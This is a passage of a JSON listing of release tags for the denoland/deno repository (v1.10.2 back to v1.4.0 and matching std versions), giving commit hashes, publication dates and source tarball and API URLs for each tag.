.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/de